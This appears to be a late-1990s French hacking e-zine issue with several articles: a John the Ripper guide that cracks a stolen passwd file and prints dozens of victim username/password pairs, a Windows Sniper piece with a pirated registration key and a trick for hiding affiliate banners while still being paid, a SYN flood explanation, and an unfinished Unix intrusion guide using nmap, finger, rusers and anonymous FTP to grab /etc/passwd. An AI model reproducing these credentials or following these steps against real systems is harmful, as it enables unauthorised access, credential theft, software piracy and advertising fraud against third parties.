HACKING COUNTERSTRIKE - 2

 

UTILISATION AVANCEE DE JOHN THE RIPPER v1.2 (par LoginX)

Voici un article sympa pour eviter de se prendre la tete quand on a besoin de craquer avec John the Ripper v1.2, la documentation etant en anglais, ca pose des problemes a pas mal de monde alors je vais resumer et donner quelques astuces.

Les explications se rapportent a John the Ripper v1.2 pour MS-DOS ou Windows (win32) mais le prochain article (cf : CounterStrike #3) traitera uniquement des plateformes UNIX.

Tout d'abord, on vient de recuperer son fichier passwd par le moyen que vous voulez alors on est tres content, si on utilise john normalement, on va faire par exemple john -single passwd.1 et on verra arriver un truc genre :

John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer

Loaded 381 passwords with 362 different salts

aluba (aluba)
staff (staff)
akko (akko)
bmwepm (bmwepm)
cerezo (cerezo)
sss (sss)
mandante (andante)
yagemi (miyage)
marie123 (marie)
news555 (news)
reg888 (reg)
v: 11 c: 231414 t: 0:00:00:06 99% c/s: 38569 w: *****DONE*****

Nous voila donc avec 11 comptes dans nos filets, c'est pas grand chose quand on sais qu'il y en a 381 mais c'est deja un bon debut...

Le mode single utilise en fait une petite liste de mots de pass courants integres a John, on va maintenant utiliser une vraie word list, la, on a que l'embaras du choix, y a des milliards de word lists sur la terre mais comme on a affaire a un serveur coreen, on va utiliser une wordlist coreenne qu'on va appeler word.lst par exemple, pour utiliser john avec cette word list, on fera donc : john -wordfile:words.lst passwd.1 sachant que le mode wordfile indique a John qu'on travaille en word list avec la liste qui suit l'instruction. On obtiendra donc ce resultat par exemple :


John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer

Loaded 370 passwords with 351 different salts

100 (million)
aguri (noriko)
akatsuki (shigyo)
anko (snd)
atsu (yoko)
azusa (sgt)

...
love (ai)
mama (anne)
matsu (masa0811)
mayumi (manyumi)
momo (dear)
nagae (miyataka)
nanase (anemone)
nobuki (bigwave)
qwertyui (takahiro)
riho (yumiohi)
risa (deto)
sen (michiyo)
suzumi (kysb)
tami (kanpei)
tokio (benlly)
tomohiro (mar)
tora (showko)
toshiko (ohwaki)
yakiniku (seikouen)
yoshiko (yoshio)
v: 33 c: 40770111 t: 0:00:13:06 99% c/s: 51870 w: *****DONE*****

Bon, on a maintenant 33 comptes de plus, c'est un bon debut, on a helas besoin d'un maximum de comptes si ce n'est tous et si possible, du root donc on va utiliser une autre methode, le mode brute force reel aussi appelle mode incrementiel, pour se faire, on tapera la commande suivante : john -i passwd.1 -beep qui donnera donc pour resultat :

John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer

Loaded 337 passwords with 321 different salts

dp (murota)
1234 (katsu)
1234 (fujita)
1234 (minami)
1234 (hitoko)
1234 (shimiken)
1234 (karasawa)
1234 (newton)
1234 (futami)
2211 (tamiko)
fff (hiro)
1940 (hori)
1956 (akimaro)
130 (yonezawa)
f32 (ken2)
1274 (junjun)
330 (nishi)
163 (hiromi)
t14 (hiramura)
1010 (shigeru)
1984 (info)
1108 (uedagumi)
1919 (fukuda)
1919 (kara)
1439 (pojriku)
1307 (chikako)
1326 (ojisan)
s2675 (soma)
brain (postman)
3401 (dentalsy)
3220 (hakui)
3220 (hds)
3368 (ohi)
4250 (n34)
4774 (ritsu)
4001 (kawani)
2724 (ucchy)
2738 (kosaka)
3622 (banjos)
3655 (takata)
4656 (takachu)
1678 (dohi)
6096 (tec)
6551 (advance)

 

 

Bon, on en a maintenant 89 au total et ca a pris deux bonnes heures en mode incrementiel, eh oui, le principal defaut de ce mode est sa duree, pour craquer les 381 comptes, avec cette becanne, il me faudrait 2 bonnes semaines, en 2 jours, j'en ai eu 110, la duree de ce mode augmente a chaque compte de facon exponentiel et c'est normal...

On a maintenant un certain nombre de comptes dans nos filets et c'est pas pour nous deranger, pour les consulter, c'est une autre histoire puisqu'il n'enregistre pas ca dans un fichier ou enfin si mais john.pot n'est pas exploitable a l'etat brut, on va donc utiliser l'instruction suivante : john -show passwd.1 et la, John va lire John.pot et vous presenter une liste de login/pass plus lisible, plus mais pas encore assez quand on sait que nous avons nos 89 comptes qui doivent apparaitre et que donc, la fenetre MS-DOS est trop petite, voyons deja ce que ca donnerais.

yoshio:yoshiko:40044:110:::/bin/csh
kosaka:2738:20179:110:::/bin/csh
hakui:3220:40151:110::/export/home1/htdocs/hakui:/bin/csh
hds:3220:40152:110:::/bin/csh
noriko:aguri:40163:110:::/bin/csh
katsu:1234:10518:110:::/bin/csh
karasawa:1234:114:110::/export/home1/usr/karasawa:/bin/csh
rikukaze:gorou:10519:110:::/bin/csh
ucchy:2724:10522:110:::/bin/csh
manyumi:mayumi:10526:110:::/bin/csh
shigeru:1010:20183:110:::/bin/csh
takata:3655:10535:110:::/bin/csh
uedagumi:1108:10538:110:::/bin/csh
soma:s2675:10539:110:::/bin/csh
n34:4250:20187:110:::/bin/csh
nishi:330:30032:110:::/bin/csh
ohwaki:toshiko:10541:110:::/bin/csh
tec:6096:20190:110:::/bin/csh
shigyo:akatsuki:10549:110:::/bin/csh

89 passwords cracked, 293 left

Pour la plupart d'entre nous on peut pas laisser la becanne bosser sur un truc pendant 2 semaines sans arret soit parce qu'on dort avec la becanne dans la meme chambre, soit parce que ca consome trop de ressources, pour cela, John est assez bien foutu puisqu'il permet de couper tout et de reprendre plus tard, exactement la ou il en etait mais on va pas s'emmerder a taper ces putain de commandes toutes les 2 minutes... On va donc creer des fichiers batch, en shell MS-DOS tout con, de simples fichiers executables faits sous edit, le premier sera john.bat et contiendra par exemple :

john -i passwd.1 -beep
pause

Enregistrez et lancez, grace a votre nouveau programme john.bat, vous etes maintenant capable de lancer john en mode incrementiel sur votre fichier passwd d'un simple (double) click de souris, le -beep veut tout simplement dire que john emmetra un signal sonore via le buzzer de votre becanne a chaque nouveau pass obtenu.

Comme on le disait plus haut, la fenetre MS-DOS est trop petite pour le nombre de pass obtenue, on va alors creer un autre fichier batch que l'on nomera communement par l'adresse ip de la victime, xxx.xxx.xxx.xxx.bat.
Ce fichier devra contenir la commande john -show passwd.1 | more.
Pour ceux qui connaissent un peu la syntaxe, on envoies les resultats de john a un programme integre a dos (et aussi a unix) qui s'appelle more. C'est ce programme qui va etre charge d'afficher les resultats page par page, et oui mais voila, vous ne pouvez pas revenir en arriere et vous allez pas lancer votre fichier toutes les 2 minutes... et on sait qu'on peut envoyer les resultats a un programme et il y a mieux, on va carrement les envoyer a un fichier en utilisant la commande john -show passwd.1 > c:\windows\desktop\serveur.txt. Creeons maintenant l'interface du programme pour qu'il ne soit pas trop moche, on va deja mettre un petit message d'introduction puis l'adresse IP de la victime pour etre sur de ne jamais la perdre et de ne pas se tromper, on lance une instruction, on emet un autre message pour prevenir que les resultats seront enregistres dans un fichier et on lance la derniere instruction. Votre programme termine devrait ressembler a ceci :

 

@Echo off

Echo    -----------------------------------------------

Echo   \                  ATTENTION                    \

Echo   \           VOUS ETES SUR LE POINT              \

Echo   \        D'ACCEDER A DES INFORMATIONS           \

Echo   \               CONFIDENTIELLES                 \

Echo   \                                               \

Echo   \                   M  D  R                     \

Echo   \      serveur victime : xxx.xxx.xxx.xxx        \

Echo    -----------------------------------------------

pause

john -show passwd.1 | more

 

Echo    -----------------------------------------------

Echo    \                                             \

Echo    \                                             \

Echo    \           Now Writing results               \

Echo    \     in c:\windows\desktop\serveur.txt       \

Echo    \                                             \

Echo    -----------------------------------------------

 

john -show passwd.1 > c:\windows\desktop\serveur.txt

echo on

 

 

On va donc retrouver dans c:\windows\desktop (c:\windows\bureau pour les francais) le fichier serveur.txt qui contientra :

 


John the Ripper Version 1.3 Copyright (c) 1996,97 by Solar Designer

info:1984:999:110::/home/info:/bin/csh
kara:1919:103:60001::/home/kara:/bin/csh
akimaro:1956:10209:110:::/bin/csh
benlly:tokio:10217:110:::/bin/csh
million:100:205:110:::/bin/csh
snd:anko:30619:110:::/bin/csh
miyage:yagemi:10294:110:::/bin/csh
reg:reg888:888:110:KARATSU Regist:/home/reg:/bin/csh
honnami:kazu:10313:110:::/bin/csh
ken2:f32:10317:110:::/bin/csh
work:karakara:100:100:KARATSU Staff::/bin/csh
masa0811:matsu:10326:110:::/bin/csh
dohi:1678:20078:110:::/bin/csh
dear:momo:30025:110:::/bin/csh
sun:hayashis:10354:110:::/bin/csh
michiyo:sen:10355:110:::/bin/csh
bmwepm:bmwepm:10358:110:::/bin/csh
elder:NO PASSWORD:MTtbLAQEqwQuw:208:110::/home/elder:/bin/csh
anemone:nanase:20050:110::/home/anemone:/bin/csh
hiramura:t14:10374:110:::/bin/csh
seikouen:yakiniku:10377:110::/home/seikouen:/bin/csh
yonezawa:130:20060:110:::/bin/csh
hori:1940:10397:110:::/bin/csh
anne:mama:20062:110:::/bin/csh
murota:dp:30015:110:::/bin/csh
dentalsy:3401:20065:110:::/bin/csh
mar:tomohiro:10406:110::/home/mar:/bin/csh
advance:6551:30027:110:::/bin/csh
ojisan:1326:10412:110::/home/ojisan:/bin/csh
andante:mandante:10000:110:::/bin/csh
andoh:hattori:10413:110:::/bin/csh
showko:tora:10419:110:::/bin/csh
agri24:kita:10426:110:::/bin/csh
tamiko:2211:30006:110:::/bin/csh
cerezo:cerezo:20098:110::/export/home1/htdocs/cerezo:/bin/csh
yoko:atsu:40081:110:::/bin/csh
ohi:3368:40080:110:::/bin/csh
yumiohi:riho:20108:110:::/bin/csh
aluba:aluba:20110:110:::/bin/csh
kawani:4001:30009:110:::/bin/csh
kysb:suzumi:20121:110:::/bin/csh
miyataka:nagae:10459:110:::/bin/csh
banjos:3622:30011:110:::/bin/csh
hitoko:1234:10464:110:::/bin/csh
news:news555:555:110:KARATSU News:/home/news:/bin/csh
marie:marie123:20128:110:::/bin/csh
staff:staff:50001:60001::/home/staff:/bin/csh
sss:sss:50002:60001::/home/sss:/bin/csh
pojriku:1439:10474:110:::/bin/csh
postman:brain:20135:110:::/bin/csh
sgt:azusa:10478:110:::/bin/csh
takachu:4656:20142:110:::/bin/csh
ritsu:4774:10483:110:::/bin/csh
hiro:fff:10484:110:::/bin/csh
akko:akko:20147:110:::/bin/csh
takahiro:qwertyui:20148:110:::/bin/csh
bigwave:nobuki:20160:110:::/bin/csh
deto:risa:20163:110:::/bin/csh
minami:1234:30031:110:::/bin/csh
ai:love:40112:110:::/bin/csh
futami:1234:10499:110:::/bin/csh
newton:1234:20169:110:::/bin/csh
fujita:1234:10501:110:::/bin/csh
chikako:1307:20172:110:::/bin/csh
kanpei:tami:20173:110:::/bin/csh
emi:hitomi:10505:110:::/bin/csh
shimiken:1234:10509:110:::/bin/csh
fukuda:1919:30005:110:::/bin/csh
junjun:1274:10513:110:::/bin/csh
hiromi:163:112:110:::/bin/csh
yoshio:yoshiko:40044:110:::/bin/csh
kosaka:2738:20179:110:::/bin/csh
hakui:3220:40151:110::/export/home1/htdocs/hakui:/bin/csh
hds:3220:40152:110:::/bin/csh
noriko:aguri:40163:110:::/bin/csh
katsu:1234:10518:110:::/bin/csh
karasawa:1234:114:110::/export/home1/usr/karasawa:/bin/csh
rikukaze:gorou:10519:110:::/bin/csh
ucchy:2724:10522:110:::/bin/csh
manyumi:mayumi:10526:110:::/bin/csh
shigeru:1010:20183:110:::/bin/csh
takata:3655:10535:110:::/bin/csh
uedagumi:1108:10538:110:::/bin/csh
soma:s2675:10539:110:::/bin/csh
n34:4250:20187:110:::/bin/csh
nishi:330:30032:110:::/bin/csh
ohwaki:toshiko:10541:110:::/bin/csh
tec:6096:20190:110:::/bin/csh
shigyo:akatsuki:10549:110:::/bin/csh

89 passwords cracked, 293 left

 

 

Et voila, vous pouvez maintenant revenir en arriere, en avant, rechercher des chaines de caracteres avec notepad et tout est sauvegarde.

 

Quand le programme arrive a craquer les 381 comptes, il devrait automatiquement sauvegarder les resultats, on va donc implementer au programme john.bat une variante de xxx.xxx.xxx.xxx.bat pour que tout soit sauvegarde automatiquement des la fin de decryptage, voici la nouvelle tete de john.bat :

 


john -i passwd.1 -beep

 

@Echo off

Echo    -----------------------------------------------

Echo   \                  ATTENTION                    \

Echo   \           VOUS ETES SUR LE POINT              \

Echo   \        D'ACCEDER A DES INFORMATIONS           \

Echo   \               CONFIDENTIELLES                 \

Echo   \                                               \

Echo   \                   M  D  R                     \

Echo   \      serveur victime : xxx.xxx.xxx.xxx        \

Echo    -----------------------------------------------

pause

john -show passwd.1

 

Echo    -----------------------------------------------

Echo    \                                             \

Echo    \                                             \

Echo    \           Now Writing results               \

Echo    \     in c:\windows\desktop\serveur.txt       \

Echo    \                                             \

Echo    -----------------------------------------------

 

john -show passwd.1 > c:\windows\desktop\serveur.txt

echo on

 

 

On a donc enleve le | more de xxx.xxx.xxx.xxx.bat et nous voila avec un programme completement automatise et autonome, on le lance au demarage et il travaillera toute la journee en fond.

 

Pour m'apporter vos conseils, astuces, appreciations ou autres suggestions au sujet de cet article, ecrivez moi a ecomdespe@hotmail.com.

 

 

REPRENDRE LE CONTROLE DE WINDOWS (par LoginX)

 

Structure de l'article : 
Introduction 
1> les boites de dialogue  rebelles
2> Les bannieres d'acces gratuit (Canada&US)  
3> Les bannieres pour gagner de l'argent  
Conclusion

 

Introduction :


On connait tous ces bannieres qui nous pompe vraiment a longueur de journee pour ceux qui tournent sous windows, que ce soient les fenetre du style "Le programme a effectue une operation non conforme et va etre ferme, cliquez sur ok pour le fermer" on clique sur ok et evidement, la fenetre avec le meme message re-apparait immediatement et y a rien a faire pour l'arreter, elle reste au premiere plan et c'est vraiment tres casse... pieds, on a aussi les bannieres pour les canadiens et americains qui sont fournies avec les acces gratuits a internet (altavista, excite, etc...) en guise de sponsor, il y a aussi les bannieres des programmes d'affiliations qui comme les bannieres d'acces gratuit restent au premier plan de votre ecran et se re-actualisent toute les 30 secondes, j'ai trouve par hasard il y a juste une semaine une solution a tous ces problemes et j'ai donc decide de vous faire partager cette trouvaille.

J'utilise pour cela un programme qui s'appelle Windows Sniper, vous le trouverez a l'adresse suivante : http://www.unhuman.com
Ce programme est fait en VB (si, si, et y marche vraiment et tout...) et vous permet de controler toutes les fenetres de windows a volonte.

Voici un petit texte que je me contente de traduire pour vous decrire le programme :

" Le but de ce programme est de vous rendre le controle de votre ordinateur.
 Trop souvent, les developpeurs de logiciels pensent que vous voulez faire les choses comme eux le font.
 Malheureusement, bien souvent ca ne fonctionne pas de cette facon chez l'utilisateur final.
 Maintenant, vous pouvez utiliser Windows Sniper pour contribuer a ce que votre ordinateur se comporte comme VOUS le souhaitez.
 Windows Sniper vous permet de faire toutes ces choses.
Quand vous faites une action, vous pouvez apprendre a windows sniper a faire automatiquement cette action quand il detectera qu'un scenario s'execute.
Par exemple, chaque fois qu'une fenetre pop-up apparait et que vous savez que vous devez systematiquement appuyer sur le meme boutton chaque fois que la fenetre apparait (par exemple une fenetre presentant le boutton "ok"), vous pouvez apprendre au programme a faire cette action a votre place et a chaque fois que le programme verra cette fenetre, il cliquera sur le boutton "OK" a votre place rapidement et facilement.
"

Source :  Millenium Group - The Egoiste

Pour vous rentre la vie encore meilleure, voici un serial pour windows sniper :
User name : TipiaK
Registration number : ST5pfNR7MYBcoRUvaZ+uZnh+HGM

 

1 -- Les boites de dialogues rebelles :

 

On ne connait que trop le scenario du petit utilisateur tout gentil tout mignon que nous sommes tous en train de surfer sur internet quand soudain, le navigateur, que ce soit netscape aussi bien que internet explorer, s'arrete sans raison pour nous mettre en relation directe avec son amie la fenetre "Ce programme a effectue une operation non conforme et va etre ferme", cette fenetre nous aime tellement que quand on va cliquer sur "OK", elle va se fermer pour re-apparaitre immediatement et ceci, a l'infini, donc ca s'arrete jamais (pleonasme, je sais, vos gueules...)
On va donc lancer notre beau Windows Sniper, cliquer sur l'option "Pseudo Hide" puis, faire glisser la cible sur la fenetre qui doit disparaitre, la, on va maintenant cliquer sur "Take Windows out" et la Oh miracle, la fenetre a disparu et vous pouvez continuer a travailler... pour faire re-apparaitre la fenetre, on cliqueras simplement sur le boutton "BB".
 On aurait eu cependant mieux fait d'utiliser la commande "encapsulate" on aurait donc pu cliquer sur l'onglet "Parents" puis sur l'option "Encapsulate" puis encore fait glisser l'obectif sur la fenetre et clique sur le boutton "Take Window out" et la, on voit la fenetre maintenant incorporee dans une autre fenetre avec un menu options...
Une fois dans ce monu, on cliques sur cloak (camoufler) et la encore miracle, la fenetre a disparu et n'est meme pas dans la barre de taches. Pour faire revenir la fenetre, on va se rendre dans windows sniper puis cliquer encore une fois sur "Take Window out".

Et bien nous voila debarrasse d'une bonne chose !

 

2 -- Les bannieres d'acces gratuit (Canada&US)

 

En france, on trouve beaucoup de providers gratuit et c'est normal puisque les factures de communication telephoniques atteignent les plus sommets internationaux, cela permet a france telecom (notre operateur prefere) de filer du fric a ces providers qui leur offrent des petits clients tout chauds tout beaux...
Comme tout le monde le sait (j'espere) aux etats-unis ainsi qu'au canada, les communications telephoniques pour internet sont entierement gratuites donc evidement, les providers gratuit, ca cours pas les rues...
Il y en a tout de meme (altavista, excite, abc.com, etc...) mais il y a tout de meme quelque chose de tres emmerdant avec ces providers, ils imposent des bannieres de pub qui vont s'installer au premier plan de votre windows... sisi, vous avez bien lu, ca prend facile dans les... 1/6e de votre ecran et c'est franchement casse couille, en plus, il faut cliquer sur les bannieres au moins une fois toutes les heures car sinon, ca va vous deconnecter, et si vous fermez la fenetre, ca vous deconnecterais aussi... SI !
Alors tonton LoginX arrive encore avec l'artillerie lourde... ils veulent nous en faire bouffer de la pub, bah  tres bien on va la bouffer, mais on va essayer de la digerer plus facilement, tout d'abord, il faut charger Windows Sniper puis aller directement dans parents, cette fois ci, pas de chichi, on va pas essayer 36 solutions, on va directement encapsuler la fenetre comme explique dans le chapitre precedent, helas, il faudra toutes les heures faire sortir la banniere de son ptit trou parce que si vous cliquez pas dessus une fois par heure ou que vous restez inactif trop longtemps, et bah paf, ca vous vire...
Mais fort heureusement il y a des cracks pour lutter contre ca... des simples programmes qui virent le timeout donc vous restez connecte en permanence et qui virent le banner refresh, en effet, toutes les minutes, le programme va changer de banniere pour afficher un nouveau sponsor et ca vous bouffe la bande passante de maniere hallucinante, les cracks deja disponibles permettent de virer cette fonction qu'on ne peut pourtant pas qualifier de debile, on peut pas leur en vouloir de vouloir grappiller 3 sous par ci par la...

 

3 -- Les bannieres pour gagner de l'argent

 

C'est devenu presque obligatoire, on est deja tous abonnes a un programme d'affiliations quelconque, d'une maniere ou d'une autre meme si on ne le sait pas, on sait aussi tous ce que c'est j'espere mais sinon c'est pas grave, ne vous affolez pas, j'explique.
Une nouvelle economie a recement fait surface, et ce, quoi qu'on dise de mal contre internet, grace (justement) a internet, des emplois sont crees et des tas de personnes commencent a gagner pas mal de fric grace a ca, cette economie paralelle est basee sur un systeme qui meme si on ne le pense pas forcement, est rentable pour tout le monde, ce systeme s'appelle l'affiliation, c'est tres simple, une personne va vouloir promouvoir son site ou ses services, il faut qu'il atteigne le plus de monde possible, mais que ca ne lui coute pas trop cher, il ne peut pas mettre des bannieres dans la rue puisque a peine 30% de la population qui regardera son affiche aura la possibilite de regarder son site et donc de lui faire gagner sa vie, il faut donc trouver un endroit pour faire sa pub sans que ca gene trop mais pour que ca touche un maximum de monde possivle.
La rue n'existant pas sur internet, puisqu'on pourrait dire qu'on passe directement de piece en piece, il n'y a pas 36 solution, il faut placer sa banniere dans une piece, mais pour ca, il faut l'accord du proprio et donc il faut le payer.
Des hebergeurs gratuits sont alors apparus, vous proposant de l'espace (une piece) gratuit a la seule condition que vous placiez une banniere de pub sur votre site, sachant que ces hebergeurs vont avoir du succes, ils savent que meme si juste 1% des visiteurs des sites heberges chez eux vont cliquer sur la banniere, ca sera toujours rentable, ces hebergeurs sont tres vite devenus tres gros et pour cause, ils recoivent de l'argent de tout les cotes... de l'etat parce qu'ils promouvoient un nouveau moyen de communication, de france telecom parce qu'ils attirent du monde a rester connecte plus longtemps sur internet, et donc des sponsors, bientot, de plus en plus de monde a voulu faire comme eux et placer des bannieres pour des annonceurs divers, de veritables regies publicitaires se sont mises alors en place pour satisfaire cette nouvelle demande qui s'annoncait deja prometeuse, les bannieres sont tres vite devenues vitale pour tout site qui tient a se promouvoir et se faire connaitre et tous les systemes sont bons pour nous faire bouffer des bannieres, le dernier truc qu'ils ont inventes, c'est de nous payer pour les bouffer, alors nous comme on est vraiment radins, on les bouffe les bannieres, mais voila, ca fait planter windows, ca se met au premier plan de votre ordinateur et on a l'impression que c'est carrement les annonceurs qui surfent sur internet a notre place...
Voila donc l'interet encore une fois, de ma trouvaille, Windows Sniper, en effet, si vous reduisez les fenetres, le programme va le detecter et vous gagnerez plus de sousous  :(
La technique de l'encapsulation encore une fois va nous sauver, nous allons tout simplement encapsuler la banniere de pub, puis camoufler la nouvelle fenetre et la oh miracle (bis) on ne voit plus la banniere, et le must, c'est que la banniere est invisible mais pas reduite, donc vous continuez a gagner votre fric, vous pouvez donc vous abonner sans aucun probleme a 3, 4, 5 programmes d'affiliations (si vous avez le cable paske sinon votre connexion va vite lacher) sans remarquer aucun changement mais en gagnant beaucoup d'argent.
Mais attention, il y a encore mieux... on utilise pas de crack ou rien, c'est parfaitement legal, personne ne peut vous accuser de tricher parce que vous camouflez une fenetre sur votre propre ordinateur.

 

Conclusion :

 

Depuis la prehistoire, l'homme a toujours eu envie de controler ses con-generes, de fouiller dans les affaires des autres, de les surveiller, etc...
Cette attitude est devenue  commune est s'est considerablement developpee grace (a cause de) a Internet, les developpeurs vont maintenant de plus en plus loin pour nous faire faire ce qu'ils ont envie qu'on fasse, pour savoir qui on est, ce qu'on fait et pourquoi, contrairement a ce que tout le monde dit, c'est pas (que) pour le fric, c'est tout simplement parce que ca a toujours ete dans la nature de l'homme de vouloir controler les autres quand il est en situation de force, cet article vous l'a demontre et vous a surtout appris a faire tourner court a ces protocoles stupides de mouttons qui consistent a se laisser faire, la theorie du "Apres tout c'est pas si mal", grace a cet article, vous reprenez le control de votre systeme dont les trous de securite non pas dans la programmation mais dans l'organisation, ont etes exploites a l'insu de votre plein gre par des gens mal intentionnes et ca c'est vraiment pas bien alors maintenant, vous reprenez le controle complet.

Elle est pas belle la vie ?    :)

Si vous souhaitez que je fasse un article plus complet sur Windows Sniper ou les bannieres en general pour CounterStrike #3, envoyez moi un message a l'adresse suivante : loginx@tipiak2000.com mais si cette adresse marche pas, mon adresse permanente est ecomdespe@hotmail.com

J'espere avoir resolu les problemes que vous pouviez avoir lors de cet article.
Si vous souhaitez voir un article precis de moi dans CounterStrike #3 et que vous pensez que j'en suis capable, envoyez moi un email, pareil, a ecomdespe@htomail.com 

 

SYNFLOOD


Quand un systeme (appele le client) essaye d'etablir une connection TCP (Transfert Control Protocole) a un serveur , le client et le serveur se mettent a echanger une sequence de message. Cette technique de conection est applique sur toutes les connections TCP (telnet, web , email etc ...).
Le client commence par envoyer une demande de synchronisation SYN (SYN pour synchronisation) et un ISN (numéro initial de séquence) au serveur . Le serveur reconnais le message SYN puis renvoi un flags SYN, un ISN, et un flag ACK (ACK pour acknoledgement) au client, qui autorise la connexion. Enfin le client renvoie les flags SYN et ACK, ce qui ouvre un circuit de communication en mode full duplex. La connexion entre le client et le serveur permet d'échanger les données spécifiques.
En fait ca donne un truc comme ca (une image vaut mieux que mille mots):

Client
Serveur
SYN-ISN ----------->  
  <----------- SYN-ISN-ACK
SYN-ACK ----------->  


La technique consiste donc à envoyer envoyer une série de SIN-ISN, sans attendre la réponse du serveur, et encore moins de répondre au serveur par un SYN-ACK. Le serveur passera donc son temps à envoyer des SYN-ISN-ACK, et comme ces réponses sont executées en priorité haute par le serveur, il finira par se saturer. De plus, il construit dans sa memoire un systeme de donnée qui décrit toutes les mauvaises connections mais cette structure n'as pas une taille infini =)
Et nous pouvons creer un debordement de memoire (overflow) sur le serveur si nous ouvrons partiellement beaucoup de connections comme je le disais plus haut.

Bon comment on vas faire pour creer un debordement de memoire (overflow) sur le serveur , comment on vas faire ca !
Ba c'est tout con on vas utiliser un programme pour envoyer des flags SYN au serveur. Je vais quand même pas vous expliquer comment envoyer des flags syn.
Si vous etes sous linux c'est plus facile de trouver un prog alors je vais vous laisser chercher comme vous etes sur cette os =).

Remarques :

-C'est bien vous savez le faire mais ca fait quoi au juste, en fait ca empeche toutes personnes a se connecter au serveur mais les personnes qui etaient connectee avant l'attaque peuvent continuer a utiliser le serveur.

-Cette technique necessite une bonne connection , si vous possedez un modem 56k vous reussirez à SYN flooder le serveur pas plus de 45 secondes grand maximum.

-Je m'en souvien plus =(

 

INTRUSION DANS UN SYSTEME UNIX

-Disclamerz:

Arf !J 'aurais déjà pas dû mettre ce titre;tant pis,mais  je sais pas comment on fait pour effacer...
Ce 'tit file est déstiné aux gens HONNETES qui s'intéressent de près ou de loin à la sécurité informatique =).Je ne vous encourage en aucun cas à faire ce qui suit, étant donné que c'est illégal ( entendez par la que c'est pas légal ).Bon et comme d'hab, si vous le faites quand même, et bien ni moi ni le crew Tipiak ne répondrons de vos conneries ( hého faut pas rêver ).

-Intro:

Cet article est déstiné aux newbies de Linux ( jen suis un aussi ). Il aborde quelques failles de sécurités simples à exploiter, et vous parmettra normalement de vous pogner au moins un account sur un server, ce qui est déja pas mal pour commencer. Achtung !Nous ne parlerons ici que de servers sous *nix ( pas NT ) et nos principales attaques (toutes ?) se dérouleront a partir d'une station Linux (la vôtre ou un server ).
Ben voila pour l'intro...Si vous avez des problemes, ou des questions ou des suggestion ou des cadeaux: _n9_@Caramail.com ou chuis sur Hilti: 0800 397 397 vmb n° 8631 voila on va pouvoir commencer la...
Ah oué, j'oubliais les prérequis: une connaissance minimale de Linux, et ... de la patience =).

 

1) Obtenir des informations sur la cible:

nmap :

Il est important de connaitre un maximum une cible potentielle ( OS et version des démons...)

-pour connaitre l'OS de notre server, on peut utiliser NMAP, qui est en fait un scanner de ports. (pour lancer la  détection d'OS il faut etre root sur votre bécane)
>Tipwar $ su

password:

root@Tipwar # ./nmap -sS -p 80 -O -v www.cible.com

Et voilà...si nmap a bien fait son boulot ( ce qui arrive presque tjrs ), vous avez déja une info importante...
n.b.:On pourrait très bien faire une tite session telnet sur le port 23 de notre server afin de glaner les infos voulues, mais les admins s'amusent souvent a virer le greeting avec le nom et la version de l'OS, voire carrément a faire de l'intox...
Voila ce que ca donne :

melchior:/nmap# ./nmap -sS -p 80 -O -v www.chez.com
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

Host www.chez.com (195.68.91.28) appears to be up ... good.

Initiating SYN half-open stealth scan against www.chez.com (195.68.91.28)

Adding TCP port 80 (state Open).

The SYN scan took 0 seconds to scan 1 ports.

For OSScan assuming that port 80 is open and port 42496 is closed and neither are firewalled

Interesting ports on www.chez.com (195.68.91.28):

Port    State      Protocol  Service

80     open        tcp       http

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=2571413 (Good luck!)

Sequence numbers: 47D0A9B8 47DD7A1B 47E694B7 4772AEA2 475A4DE6 47821838
Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

Voila: Chez ils runnent Linux =) on est pas les seuls.

Continuons avec nmap; on va juste scanner les ports de notre server, comme ca pour voir ...

>root@Tipwar # ./nmap -sS -v www.cible.com
Ici, nmap nous fait un scan TCP "furtif". ( demi-ouverture des ports pour rester discret...je sais pas si c'est vraiment efficace mais bon...)
ou
>Tipwar $ nmap -ST -v www.cible.com

pour un scan TCP normal.(amusez vous a telnetter sur tous les ports ouverts, surtout si le 23 et le 25 sont fermés )

finger / rusers :

Nous pouvons ensuite utiliser la commande "finger" pour cette fois ci, obtenir des infos sur les utilisateurs.

Tipwar $ finger @www.cible.com
[www.FT.com]

Login     Name      TTY  Idle   When         Where

------     -------      ----  -----   -------         --------

_n9_       lol           co   45d   Tue 5h00    Tipiak.com

NEXXT    mdr          co   30s   Wed 6h30   Tipiak.com

 

Mmh, deux utilisateurs de loggués: _n9_ vous avez mon nom =)
vous savez que je suis loggué et que je scotche mon écran sans rien faire depuis 45 jours ( donc théoriquement chuis pas là, ou je suis mort) et NEXXT, lui il a commencé a scotcher ya 30s.Je vous laisse deviner les deux dernieres colonnes...
ndlr: finger peur servir à  éviter de venir sur le server en même temps que le root et éviter ainsi de se faire remarquer...
n.b.: finger -l c'est sympa aussi

-rusers une autre commande similaire a finger, je vous laisse en juger par vous meme:

Tipwar $ rusers -l www.cible.com

Login    Home-dir    Shell      Last login, from where
-------   ------------   ------     ---------------------------

root                  /  /bin/sh    Fri Nov 5 07:42 on ttyp1 from fuck.FT.com

bin               /bin                Never logged in

nobody             /                 Never logged in

n9       /home/n9/  /bin/sh    Tue Dec 9 13h01 on ttyp2 from tipiak.com

psy      /home/psy /bin/psi    Sun Mar 2  00h44 on ttyp1 from tiptop.cz

guest  /export/foo /bin/sh     Never logged in

ftp       /home/ftp                Never logged in (mmh)

Bah voila kwa j'ai pas grand chose a dire la dessus =)

-Dernière chose on peut aussi telneter sur le port 25 ( SMTP )de notre victime, pour connaitre la version de son Sendmail. ( plus c'est vieux, mieux c'est ! du genre en dessous de 8.5 c'est cool).
Par contre, je traiterai pas de ça dans cet article, donc soit vous vous démerdez, soit vous attendez CounterStrikE XX où ca sera vraisemblablement dedans...
 

2) Les Failles:


Bon, vous pouvez toujours tester le bug ftp ( cf Tipiak )mais c'est un miracle si ca marche
Sinon c'est pas compliqué, pour se trouver  un account, il faut aller chercher le fichier pass: /etc/passwd...
Si d'une manière ou d'une autre vous l'avez choppé, hop ! john the ripper (cf l'article de LoginX.)

-Ensuite, si l'admin est à chier, essayez de récupérer le fichier passwd en ftp:
Tipwar $ ftp www.cible.com

Login: ftp

Pass: ftp

ftp>get /etc/passwd

